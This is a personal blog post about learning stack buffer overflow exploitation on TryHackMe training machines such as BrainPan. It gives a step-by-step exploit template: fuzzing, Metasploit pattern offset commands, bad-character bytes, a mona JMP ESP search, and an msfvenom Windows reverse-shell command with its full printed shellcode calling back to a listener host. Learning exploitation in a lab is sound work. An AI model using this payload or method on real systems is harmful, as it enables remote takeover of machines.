Buffer Overflow

Introduction

Frankly a large part of my life, I have been scared of buffer overflows.
I know how that sounds, but honestly, I have no shame in that
So finally, I gathered enough courage and thought I should give it a go.

. . .

What Helped

The following list of things worked like a charm:
1. Courage :P
2. The Cyber Mentor and his videos series.
3. The Buffer Overflow Room on TryHackMe by Tiberius.

. . .

How?

Well, first watch all the videos, there are only 8 in the series and they are pretty short as well.

Then move on to TryHackMe and start solving the buffer overflow questions.
It takes a certain amount of leap of faith, but when I got my first shell, it was definitely worth it.

After solving a few machines you will start getting familiar with the whole method. By the time I shelled the 6th one, I started feeling confident and just went on with BrainPan. Trust me, it is a lot simpler. All you gotta do is get your hands in.

. . .

What I have done?

Well. Once I started getting a little confident about my method, I asked a friend ( who I know knows Buffer Overflows well ) to check. I am going to share the methodology that I think is going to work for me hoping that it might help someone.

I would like to mention that I would like to give all the credits of the following work to Tiberius and The Cyber Mentor.

. . .

Methodology

#In this file resides the BO Template
##########################################################################################
#Get the IP and port for the target machine.
targetIP='192.168.0.168'
port=9999
##########################################################################################
#Step 0 -- Spike the service to see which command is vulnerable. In these cases, we know all the functions are vulnerable.
##########################################################################################
command=""
##########################################################################################
#Step 1 -- Fuzz the app, find approx bytes it takes to crash the program.
##########################################################################################
# ./1-fuzz.py
# Server Crashed at : 600 Bytes.
##########################################################################################
# Step 2 -- With the approximate bytes, generate a pattern using the following command.
##########################################################################################
# -----------------------Generate Pattern -------------------------------------------------#
# While generating pattern, take 400 more bytes, just in case.
# /opt/metasploit-framework/embedded/framework/tools/exploit/pattern_create.rb -l 1000
buffer_pattern="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B"
# Then send this pattern to the app, and then copy the bytes from EIP.
# ./2-offset.py
# Pattern found from the EIP : 35724134
###########################################################################################
#Step 3 ---> Get the exact offset from the Pattern and verify if we can control the EIP.
###########################################################################################
# Get the exact offset using the following command
# /opt/metasploit-framework/embedded/framework/tools/exploit/pattern_offset.rb -l 2600 -q 35724134
offset=524
# Run ./3-controlEip.py to check if the EIP is now 42424242.
# If it is, move ahead, otherwise see if the offset is correct or maybe 42 is the bad char.
# Basically debug.
###########################################################################################
# This is the most important part.
# Step 4 - Find bad chars.
###########################################################################################
#This is the default set of all the hex numbers.
badchars=(
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)
# Run ./4-findBadChar.py
# Go to immunity debugger, and follow the Tcp Dump of ESP.
# Copy the contents from 01 to FF to hexDump inside the BadChars directory and run ./run.sh
# BadChars = \x00
###########################################################################################
# Step 5 - Choosing the correct module and checking if the call is made.
###########################################################################################
# use !mona modules to find a dll that has all protection as off.
# then use this dll to search for a memory address.
# !mona find -s "\xff\xe4" -m brainpan.exe, here choose the return address that DOESNOT HAVE ANY BADCHAR
jmpCode="311712F3"
# convert that to little endian
jmpCode="\xf3\x12\x17\x31"
# After this step, check if the EIP has been over written.
# To check, open the app in immuntiy, create a breakpoint on the address before conversion to littleEndian
# ./5-checkGenShell.py
# and then verify if the EIP is the same. Once we have that, it's time to generate shell code.
##############################################################################################
# Step 6 - Gaining the shell
##############################################################################################
padding="\x90"*32
# Generate this overflow variable using the following command:
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.197 LPORT=1337 EXITFUNC=thread -f c -a x86 -b "\x00"
# 351 Bytes
overflow = (
"\xba\x2f\xa3\x17\x6e\xdd\xc6\xd9\x74\x24\xf4\x5f\x31\xc9\xb1"
"\x52\x83\xc7\x04\x31\x57\x0e\x03\x78\xad\xf5\x9b\x7a\x59\x7b"
"\x63\x82\x9a\x1c\xed\x67\xab\x1c\x89\xec\x9c\xac\xd9\xa0\x10"
"\x46\x8f\x50\xa2\x2a\x18\x57\x03\x80\x7e\x56\x94\xb9\x43\xf9"
"\x16\xc0\x97\xd9\x27\x0b\xea\x18\x6f\x76\x07\x48\x38\xfc\xba"
"\x7c\x4d\x48\x07\xf7\x1d\x5c\x0f\xe4\xd6\x5f\x3e\xbb\x6d\x06"
"\xe0\x3a\xa1\x32\xa9\x24\xa6\x7f\x63\xdf\x1c\x0b\x72\x09\x6d"
"\xf4\xd9\x74\x41\x07\x23\xb1\x66\xf8\x56\xcb\x94\x85\x60\x08"
"\xe6\x51\xe4\x8a\x40\x11\x5e\x76\x70\xf6\x39\xfd\x7e\xb3\x4e"
"\x59\x63\x42\x82\xd2\x9f\xcf\x25\x34\x16\x8b\x01\x90\x72\x4f"
"\x2b\x81\xde\x3e\x54\xd1\x80\x9f\xf0\x9a\x2d\xcb\x88\xc1\x39"
"\x38\xa1\xf9\xb9\x56\xb2\x8a\x8b\xf9\x68\x04\xa0\x72\xb7\xd3"
"\xc7\xa8\x0f\x4b\x36\x53\x70\x42\xfd\x07\x20\xfc\xd4\x27\xab"
"\xfc\xd9\xfd\x7c\xac\x75\xae\x3c\x1c\x36\x1e\xd5\x76\xb9\x41"
"\xc5\x79\x13\xea\x6c\x80\xf4\xd5\xd9\x8a\xc1\xbe\x1b\x8a\xcc"
"\x07\x95\x6c\xa4\x67\xf3\x27\x51\x11\x5e\xb3\xc0\xde\x74\xbe"
"\xc3\x55\x7b\x3f\x8d\x9d\xf6\x53\x7a\x6e\x4d\x09\x2d\x71\x7b"
"\x25\xb1\xe0\xe0\xb5\xbc\x18\xbf\xe2\xe9\xef\xb6\x66\x04\x49"
"\x61\x94\xd5\x0f\x4a\x1c\x02\xec\x55\x9d\xc7\x48\x72\x8d\x11"
"\x50\x3e\xf9\xcd\x07\xe8\x57\xa8\xf1\x5a\x01\x62\xad\x34\xc5"
"\xf3\x9d\x86\x93\xfb\xcb\x70\x7b\x4d\xa2\xc4\x84\x62\x22\xc1"
"\xfd\x9e\xd2\x2e\xd4\x1a\xf2\xcc\xfc\x56\x9b\x48\x95\xda\xc6"
"\x6a\x40\x18\xff\xe8\x60\xe1\x04\xf0\x01\xe4\x41\xb6\xfa\x94"
"\xda\x53\xfc\x0b\xda\x71"
)

The different scripts used in the comments are now hosted on git.
Here’s the link.

For any feedback or corrections, please let me know.

Thank you for going through what I had to share, if you feel that someone could benefit from this, do share.

Stay Home, Stay Safe :D

. . .